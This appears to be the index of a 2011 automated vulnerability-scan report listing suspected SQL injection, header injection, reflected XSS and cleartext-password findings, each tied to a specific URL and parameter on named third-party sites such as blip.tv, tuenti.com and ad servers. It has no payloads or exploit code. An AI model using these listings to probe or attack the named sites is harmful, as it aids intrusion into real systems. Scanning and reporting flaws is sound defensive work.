SQL Injection, DORK, XSS, XPath Injection, CWE-79, CWE-89

Vulnerabilities in Various Hosts | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Thu Jan 20 12:04:34 CST 2011.


DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://www.kiteship.com/ [Referer HTTP header]

1.2. http://www.kiteship.com/ [name of an arbitrarily supplied request parameter]

1.3. http://www.tuenti.com/share [Referer HTTP header]

1.4. http://www.tuenti.com/share [User-Agent HTTP header]

1.5. http://www.tuenti.com/share [User-Agent HTTP header]

2. HTTP header injection

2.1. http://2822.v.fwmrm.net/ad/l/1 [cr parameter]

2.2. http://ad.afy11.net/ad [c parameter]

2.3. http://ad.doubleclick.net/ad/N5371.150779.COLLECTIVEMEDIA/B5050596.3 [REST URL parameter 1]

2.4. http://ad.doubleclick.net/adj/cm.martini/ [REST URL parameter 1]

2.5. http://ad.doubleclick.net/click [REST URL parameter 1]

2.6. http://blip.tv/about/ [REST URL parameter 1]

2.7. http://blip.tv/about/api/ [REST URL parameter 1]

2.8. http://blip.tv/about/api/ [REST URL parameter 2]

2.9. http://blip.tv/blogs/list/ [REST URL parameter 1]

2.10. http://blip.tv/blogs/list/ [REST URL parameter 2]

2.11. http://blip.tv/careers/ [REST URL parameter 1]

2.12. http://blip.tv/comments/ [REST URL parameter 1]

2.13. http://blip.tv/dashboard [REST URL parameter 1]

2.14. http://blip.tv/dashboard/ [REST URL parameter 1]

2.15. http://blip.tv/dashboard/ads [REST URL parameter 1]

2.16. http://blip.tv/dashboard/ads [REST URL parameter 2]

2.17. http://blip.tv/dashboard/distribution [REST URL parameter 1]

2.18. http://blip.tv/dashboard/distribution [REST URL parameter 2]

2.19. http://blip.tv/dashboard/episodes [REST URL parameter 1]

2.20. http://blip.tv/dashboard/episodes [REST URL parameter 2]

2.21. http://blip.tv/dashboard/ftp/ [REST URL parameter 1]

2.22. http://blip.tv/dashboard/ftp/ [REST URL parameter 2]

2.23. http://blip.tv/dashboard/players [REST URL parameter 1]

2.24. http://blip.tv/dashboard/players [REST URL parameter 2]

2.25. http://blip.tv/dashboard/stats [REST URL parameter 1]

2.26. http://blip.tv/dashboard/stats [REST URL parameter 2]

2.27. http://blip.tv/dashboard/upload [REST URL parameter 1]

2.28. http://blip.tv/dashboard/upload [REST URL parameter 2]

2.29. http://blip.tv/dmca/ [REST URL parameter 1]

2.30. http://blip.tv/dtd/blip/1.0 [REST URL parameter 1]

2.31. http://blip.tv/dtd/blip/1.0 [REST URL parameter 2]

2.32. http://blip.tv/dtd/blip/1.0 [REST URL parameter 3]

2.33. http://blip.tv/dtd/mediaad/1.0 [REST URL parameter 1]

2.34. http://blip.tv/dtd/mediaad/1.0 [REST URL parameter 2]

2.35. http://blip.tv/dtd/mediaad/1.0 [REST URL parameter 3]

2.36. http://blip.tv/epk [REST URL parameter 1]

2.37. http://blip.tv/faq [REST URL parameter 1]

2.38. http://blip.tv/file/3006747 [REST URL parameter 1]

2.39. http://blip.tv/file/3006747 [REST URL parameter 2]

2.40. http://blip.tv/file/4341289 [REST URL parameter 1]

2.41. http://blip.tv/file/4341289 [REST URL parameter 2]

2.42. http://blip.tv/file/4416697 [REST URL parameter 1]

2.43. http://blip.tv/file/4416697 [REST URL parameter 2]

2.44. http://blip.tv/file/4469619 [REST URL parameter 1]

2.45. http://blip.tv/file/4469619 [REST URL parameter 2]

2.46. http://blip.tv/file/4581305 [REST URL parameter 1]

2.47. http://blip.tv/file/4581305 [REST URL parameter 2]

2.48. http://blip.tv/file/4584742 [REST URL parameter 1]

2.49. http://blip.tv/file/4584742 [REST URL parameter 2]

2.50. http://blip.tv/file/4590551 [REST URL parameter 1]

2.51. http://blip.tv/file/4590551 [REST URL parameter 2]

2.52. http://blip.tv/file/4627157 [REST URL parameter 1]

2.53. http://blip.tv/file/4627157 [REST URL parameter 2]

2.54. http://blip.tv/file/4639878 [REST URL parameter 1]

2.55. http://blip.tv/file/4639878 [REST URL parameter 2]

2.56. http://blip.tv/file/4644899 [REST URL parameter 1]

2.57. http://blip.tv/file/4644899 [REST URL parameter 2]

2.58. http://blip.tv/file/4645321 [REST URL parameter 1]

2.59. http://blip.tv/file/4645321 [REST URL parameter 2]

2.60. http://blip.tv/file/4648265 [REST URL parameter 1]

2.61. http://blip.tv/file/4648265 [REST URL parameter 2]

2.62. http://blip.tv/file/4648488 [REST URL parameter 1]

2.63. http://blip.tv/file/4648488 [REST URL parameter 2]

2.64. http://blip.tv/file/4650005 [REST URL parameter 1]

2.65. http://blip.tv/file/4650005 [REST URL parameter 2]

2.66. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v [REST URL parameter 1]

2.67. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v [REST URL parameter 2]

2.68. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba298.m4v [REST URL parameter 3]

2.69. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v [REST URL parameter 1]

2.70. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v [REST URL parameter 2]

2.71. http://blip.tv/file/get/Ama2010-AMA2010BackstageInterviewWithJessicaAlba447.m4v [REST URL parameter 3]

2.72. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v [REST URL parameter 1]

2.73. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v [REST URL parameter 2]

2.74. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit377.m4v [REST URL parameter 3]

2.75. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 [REST URL parameter 1]

2.76. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 [REST URL parameter 2]

2.77. http://blip.tv/file/get/ArmchairMango-DRYSuitBecomesAWETSuit905.mp4 [REST URL parameter 3]

2.78. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v [REST URL parameter 1]

2.79. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v [REST URL parameter 2]

2.80. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks496.m4v [REST URL parameter 3]

2.81. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 [REST URL parameter 1]

2.82. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 [REST URL parameter 2]

2.83. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 [REST URL parameter 3]

2.84. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 [REST URL parameter 1]

2.85. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 [REST URL parameter 2]

2.86. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 [REST URL parameter 3]

2.87. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v [REST URL parameter 1]

2.88. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v [REST URL parameter 2]

2.89. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v [REST URL parameter 3]

2.90. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v [REST URL parameter 1]

2.91. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v [REST URL parameter 2]

2.92. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v [REST URL parameter 3]

2.93. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 [REST URL parameter 1]

2.94. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 [REST URL parameter 2]

2.95. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 [REST URL parameter 3]

2.96. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 [REST URL parameter 1]

2.97. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 [REST URL parameter 2]

2.98. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 [REST URL parameter 3]

2.99. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v [REST URL parameter 1]

2.100. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v [REST URL parameter 2]

2.101. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v [REST URL parameter 3]

2.102. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 [REST URL parameter 1]

2.103. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 [REST URL parameter 2]

2.104. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 [REST URL parameter 3]

2.105. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v [REST URL parameter 1]

2.106. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v [REST URL parameter 2]

2.107. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v [REST URL parameter 3]

2.108. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow264.m4v [REST URL parameter 1]

2.109. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow264.m4v [REST URL parameter 2]

2.110. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow264.m4v [REST URL parameter 3]

2.111. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow990.m4v [REST URL parameter 1]

2.112. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow990.m4v [REST URL parameter 2]

2.113. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow990.m4v [REST URL parameter 3]

2.114. http://blip.tv/file/get/CookingUpAStory-FoodSwap163.m4v [REST URL parameter 1]

2.115. http://blip.tv/file/get/CookingUpAStory-FoodSwap163.m4v [REST URL parameter 2]

2.116. http://blip.tv/file/get/CookingUpAStory-FoodSwap163.m4v [REST URL parameter 3]

2.117. http://blip.tv/file/get/CookingUpAStory-FoodSwap232.mp3 [REST URL parameter 1]

2.118. http://blip.tv/file/get/CookingUpAStory-FoodSwap232.mp3 [REST URL parameter 2]

2.119. http://blip.tv/file/get/CookingUpAStory-FoodSwap232.mp3 [REST URL parameter 3]

2.120. http://blip.tv/file/get/CookingUpAStory-FoodSwap596.m4v [REST URL parameter 1]

2.121. http://blip.tv/file/get/CookingUpAStory-FoodSwap596.m4v [REST URL parameter 2]

2.122. http://blip.tv/file/get/CookingUpAStory-FoodSwap596.m4v [REST URL parameter 3]

2.123. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v [REST URL parameter 1]

2.124. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v [REST URL parameter 2]

2.125. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous486.m4v [REST URL parameter 3]

2.126. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v [REST URL parameter 1]

2.127. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v [REST URL parameter 2]

2.128. http://blip.tv/file/get/Culturecatch-DevonAllmanOneTakeCouldGetDangerous888.m4v [REST URL parameter 3]

2.129. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v [REST URL parameter 1]

2.130. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v [REST URL parameter 2]

2.131. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters229.m4v [REST URL parameter 3]

2.132. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v [REST URL parameter 1]

2.133. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v [REST URL parameter 2]

2.134. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters230.m4v [REST URL parameter 3]

2.135. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v [REST URL parameter 1]

2.136. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v [REST URL parameter 2]

2.137. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v [REST URL parameter 3]

2.138. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv [REST URL parameter 1]

2.139. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv [REST URL parameter 2]

2.140. http://blip.tv/file/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv [REST URL parameter 3]

2.141. http://blip.tv/file/get/Squatters-Episode13234.m4v [REST URL parameter 1]

2.142. http://blip.tv/file/get/Squatters-Episode13234.m4v [REST URL parameter 2]

2.143. http://blip.tv/file/get/Squatters-Episode13234.m4v [REST URL parameter 3]

2.144. http://blip.tv/file/get/Squatters-Episode13604.m4v [REST URL parameter 1]

2.145. http://blip.tv/file/get/Squatters-Episode13604.m4v [REST URL parameter 2]

2.146. http://blip.tv/file/get/Squatters-Episode13604.m4v [REST URL parameter 3]

2.147. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 [REST URL parameter 1]

2.148. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 [REST URL parameter 2]

2.149. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 [REST URL parameter 3]

2.150. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v [REST URL parameter 1]

2.151. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v [REST URL parameter 2]

2.152. http://blip.tv/file/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v [REST URL parameter 3]

2.153. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v [REST URL parameter 1]

2.154. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v [REST URL parameter 2]

2.155. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v [REST URL parameter 3]

2.156. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v [REST URL parameter 1]

2.157. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v [REST URL parameter 2]

2.158. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v [REST URL parameter 3]

2.159. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 [REST URL parameter 1]

2.160. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 [REST URL parameter 2]

2.161. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 [REST URL parameter 3]

2.162. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v [REST URL parameter 1]

2.163. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v [REST URL parameter 2]

2.164. http://blip.tv/file/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf759.m4v [REST URL parameter 3]

2.165. http://blip.tv/file/post/ [REST URL parameter 1]

2.166. http://blip.tv/file/post/ [REST URL parameter 2]

2.167. http://blip.tv/file/view/4639878 [REST URL parameter 1]

2.168. http://blip.tv/file/view/4639878 [REST URL parameter 2]

2.169. http://blip.tv/file/view/4639878 [REST URL parameter 3]

2.170. http://blip.tv/html5/ [REST URL parameter 1]

2.171. http://blip.tv/opensearch.xml [REST URL parameter 1]

2.172. http://blip.tv/play/AYG43E4C [REST URL parameter 1]

2.173. http://blip.tv/play/AYG43E4C [REST URL parameter 2]

2.174. http://blip.tv/play/AYG43E4C/ [REST URL parameter 1]

2.175. http://blip.tv/play/AYG43E4C/ [REST URL parameter 2]

2.176. http://blip.tv/play/AYKO2zcC [REST URL parameter 1]

2.177. http://blip.tv/play/AYKO2zcC [REST URL parameter 2]

2.178. http://blip.tv/play/AYKO2zcC/ [REST URL parameter 1]

2.179. http://blip.tv/play/AYKO2zcC/ [REST URL parameter 2]

2.180. http://blip.tv/play/AYKY+jQC [REST URL parameter 1]

2.181. http://blip.tv/play/AYKY+jQC [REST URL parameter 2]

2.182. http://blip.tv/play/AYKY+jQC/ [REST URL parameter 1]

2.183. http://blip.tv/play/AYKY+jQC/ [REST URL parameter 2]

2.184. http://blip.tv/play/AYKY31UC [REST URL parameter 1]

2.185. http://blip.tv/play/AYKY31UC [REST URL parameter 2]

2.186. http://blip.tv/play/AYKY31UC/ [REST URL parameter 1]

2.187. http://blip.tv/play/AYKY31UC/ [REST URL parameter 2]

2.188. http://blip.tv/play/AYKZp2EC [REST URL parameter 1]

2.189. http://blip.tv/play/AYKZp2EC [REST URL parameter 2]

2.190. http://blip.tv/play/AYKZp2EC/ [REST URL parameter 1]

2.191. http://blip.tv/play/AYKZp2EC/ [REST URL parameter 2]

2.192. http://blip.tv/play/AYKc0AIC [REST URL parameter 1]

2.193. http://blip.tv/play/AYKc0AIC [REST URL parameter 2]

2.194. http://blip.tv/play/AYKc0AIC/ [REST URL parameter 1]

2.195. http://blip.tv/play/AYKc0AIC/ [REST URL parameter 2]

2.196. http://blip.tv/play/AYKc93MC [REST URL parameter 1]

2.197. http://blip.tv/play/AYKc93MC [REST URL parameter 2]

2.198. http://blip.tv/play/AYKc93MC/ [REST URL parameter 1]

2.199. http://blip.tv/play/AYKc93MC/ [REST URL parameter 2]

2.200. http://blip.tv/play/AYKcqGYC [REST URL parameter 1]

2.201. http://blip.tv/play/AYKcqGYC [REST URL parameter 2]

2.202. http://blip.tv/play/AYKcqGYC/ [REST URL parameter 1]

2.203. http://blip.tv/play/AYKcqGYC/ [REST URL parameter 2]

2.204. http://blip.tv/play/AYKcqGYD [REST URL parameter 1]

2.205. http://blip.tv/play/AYKcqGYD [REST URL parameter 2]

2.206. http://blip.tv/play/hK5wgpzTKAI [REST URL parameter 1]

2.207. http://blip.tv/play/hK5wgpzTKAI [REST URL parameter 2]

2.208. http://blip.tv/play/hK5wgpzTKAI.m4v/ [REST URL parameter 1]

2.209. http://blip.tv/play/hK5wgpzTKAI.m4v/ [REST URL parameter 2]

2.210. http://blip.tv/play/hbdrgpvFPAI [REST URL parameter 1]

2.211. http://blip.tv/play/hbdrgpvFPAI [REST URL parameter 2]

2.212. http://blip.tv/play/hbdrgpvFPAI.m4v/ [REST URL parameter 1]

2.213. http://blip.tv/play/hbdrgpvFPAI.m4v/ [REST URL parameter 2]

2.214. http://blip.tv/play/hbgSgoqOawI [REST URL parameter 1]

2.215. http://blip.tv/play/hbgSgoqOawI [REST URL parameter 2]

2.216. http://blip.tv/play/hbgSgoqOawI.m4v/ [REST URL parameter 1]

2.217. http://blip.tv/play/hbgSgoqOawI.m4v/ [REST URL parameter 2]

2.218. http://blip.tv/play/hodpgpH4MwI [REST URL parameter 1]

2.219. http://blip.tv/play/hodpgpH4MwI [REST URL parameter 2]

2.220. http://blip.tv/play/hodpgpH4MwI.m4v/ [REST URL parameter 1]

2.221. http://blip.tv/play/hodpgpH4MwI.m4v/ [REST URL parameter 2]

2.222. http://blip.tv/play/hqkXgpzqKAI [REST URL parameter 1]

2.223. http://blip.tv/play/hqkXgpzqKAI [REST URL parameter 2]

2.224. http://blip.tv/play/hqkXgpzqKAI.m4v/ [REST URL parameter 1]

2.225. http://blip.tv/play/hqkXgpzqKAI.m4v/ [REST URL parameter 2]

2.226. http://blip.tv/play/hsYBgpzsBwI [REST URL parameter 1]

2.227. http://blip.tv/play/hsYBgpzsBwI [REST URL parameter 2]

2.228. http://blip.tv/play/hsYBgpzsBwI.m4v/ [REST URL parameter 1]

2.229. http://blip.tv/play/hsYBgpzsBwI.m4v/ [REST URL parameter 2]

2.230. http://blip.tv/players/embed/ [REST URL parameter 1]

2.231. http://blip.tv/players/embed/ [REST URL parameter 2]

2.232. http://blip.tv/popular [REST URL parameter 1]

2.233. http://blip.tv/posts/ [REST URL parameter 1]

2.234. http://blip.tv/posts/report_inappropriate [REST URL parameter 1]

2.235. http://blip.tv/posts/report_inappropriate [REST URL parameter 2]

2.236. http://blip.tv/prefs/security/ [REST URL parameter 1]

2.237. http://blip.tv/prefs/security/ [REST URL parameter 2]

2.238. http://blip.tv/random [REST URL parameter 1]

2.239. http://blip.tv/recent [REST URL parameter 1]

2.240. http://blip.tv/report_form/ [REST URL parameter 1]

2.241. http://blip.tv/rss [REST URL parameter 1]

2.242. http://blip.tv/rss/flash/4658178 [REST URL parameter 1]

2.243. http://blip.tv/search [REST URL parameter 1]

2.244. http://blip.tv/tools/ [REST URL parameter 1]

2.245. http://blip.tv/tos/ [REST URL parameter 1]

2.246. http://blip.tv/users/blogging_info [REST URL parameter 1]

2.247. http://blip.tv/users/blogging_info [REST URL parameter 2]

2.248. http://blip.tv/users/create/ [REST URL parameter 1]

2.249. http://blip.tv/users/create/ [REST URL parameter 2]

2.250. http://blip.tv/users/login/ [REST URL parameter 1]

2.251. http://blip.tv/users/login/ [REST URL parameter 2]

2.252. http://blip.tv/users/stats/ [REST URL parameter 1]

2.253. http://blip.tv/users/stats/ [REST URL parameter 2]

2.254. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 4]

3. Cross-site scripting (reflected)

3.1. http://a.collective-media.net/ad/cm.martini/ [REST URL parameter 1]

3.2. http://a.collective-media.net/adj/cm.martini/ [REST URL parameter 2]

3.3. http://a.collective-media.net/adj/cm.martini/ [name of an arbitrarily supplied request parameter]

3.4. http://a.collective-media.net/adj/cm.martini/ [sz parameter]

3.5. http://americascup.mediaaccess.evolix.net/index.php [co parameter]

3.6. http://americascup.mediaaccess.evolix.net/index.php [co parameter]

3.7. http://armchairmango.blip.tv/posts [name of an arbitrarily supplied request parameter]

3.8. http://armchairmango.blip.tv/posts [name of an arbitrarily supplied request parameter]

3.9. http://backend.userland.com/creativeCommonsRssModule [REST URL parameter 1]

3.10. http://blip.tv/posts/ [callback parameter]

3.11. http://brxserv.btrll.com/crossdomain.xml [REST URL parameter 1]

3.12. http://digg.com/submit [REST URL parameter 1]

3.13. http://ib.adnxs.com/ptj [redir parameter]

3.14. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 1]

3.15. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 2]

3.16. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 3]

3.17. http://k.collective-media.net/cmadj/cm.martini/ [REST URL parameter 2]

3.18. http://k.collective-media.net/cmadj/cm.martini/ [sz parameter]

3.19. http://www.americascupmedia.com/index.php [co parameter]

3.20. http://www.americascupmedia.com/index.php [co parameter]

3.21. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 2]

3.22. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 3]

3.23. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 4]

3.24. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 4]

3.25. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 5]

3.26. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [name of an arbitrarily supplied request parameter]

3.27. http://www.beneteaucountdown.com/ [name of an arbitrarily supplied request parameter]

3.28. http://www.bymnews.com/news/newsList.php [cat parameter]

3.29. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 1]

3.30. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 1]

3.31. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 2]

3.32. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 2]

3.33. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 3]

3.34. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 3]

3.35. http://www.sailinganarchy.com/article_submission.php [name of an arbitrarily supplied request parameter]

3.36. http://www.stumbleupon.com/submit [url parameter]

3.37. http://www.tuenti.com/share [name of an arbitrarily supplied request parameter]

3.38. http://www.tuenti.com/share [name of an arbitrarily supplied request parameter]

3.39. http://www.tuenti.com/share [url parameter]

3.40. http://www.yachtscoring.com/event_results_cumulative.cfm [eID parameter]

3.41. http://k.collective-media.net/cmadj/cm.martini/ [cli cookie]

4. Cleartext submission of password

4.1. http://americascup.mediaaccess.evolix.net/index.php

4.2. http://digg.com/submit

4.3. http://translate.googleusercontent.com/translate_c

4.4. http://www.americascupmedia.com/index.php

4.5. http://www.regattaregatta.com/

4.6. http://www.usaca.info/

4.7. http://www.w-w-i.com/velux_5_oceans_2010_race/

5. Session token in URL

6. Password field submitted using GET method

6.1. http://americascup.mediaaccess.evolix.net/index.php

6.2. http://digg.com/submit

6.3. http://www.americascupmedia.com/index.php

7. Cookie scoped to parent domain

7.1. http://www.stumbleupon.com/submit

7.2. http://2822.v.fwmrm.net/ad/g/1

7.3. http://2822.v.fwmrm.net/ad/l/1

7.4. http://2822.v.fwmrm.net/ad/p/1

7.5. http://ad.afy11.net/ad

7.6. http://ad.doubleclick.net/click

7.7. http://ad.doubleclick.net/clk

7.8. http://brxserv.btrll.com/favicon.ico

7.9. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/

7.10. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.click/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2Nsay8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL25vbmUvO1ZpZGVvOzEyOTU0ODI0NDI]]

7.11. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg

7.12. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg]]

7.13. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy

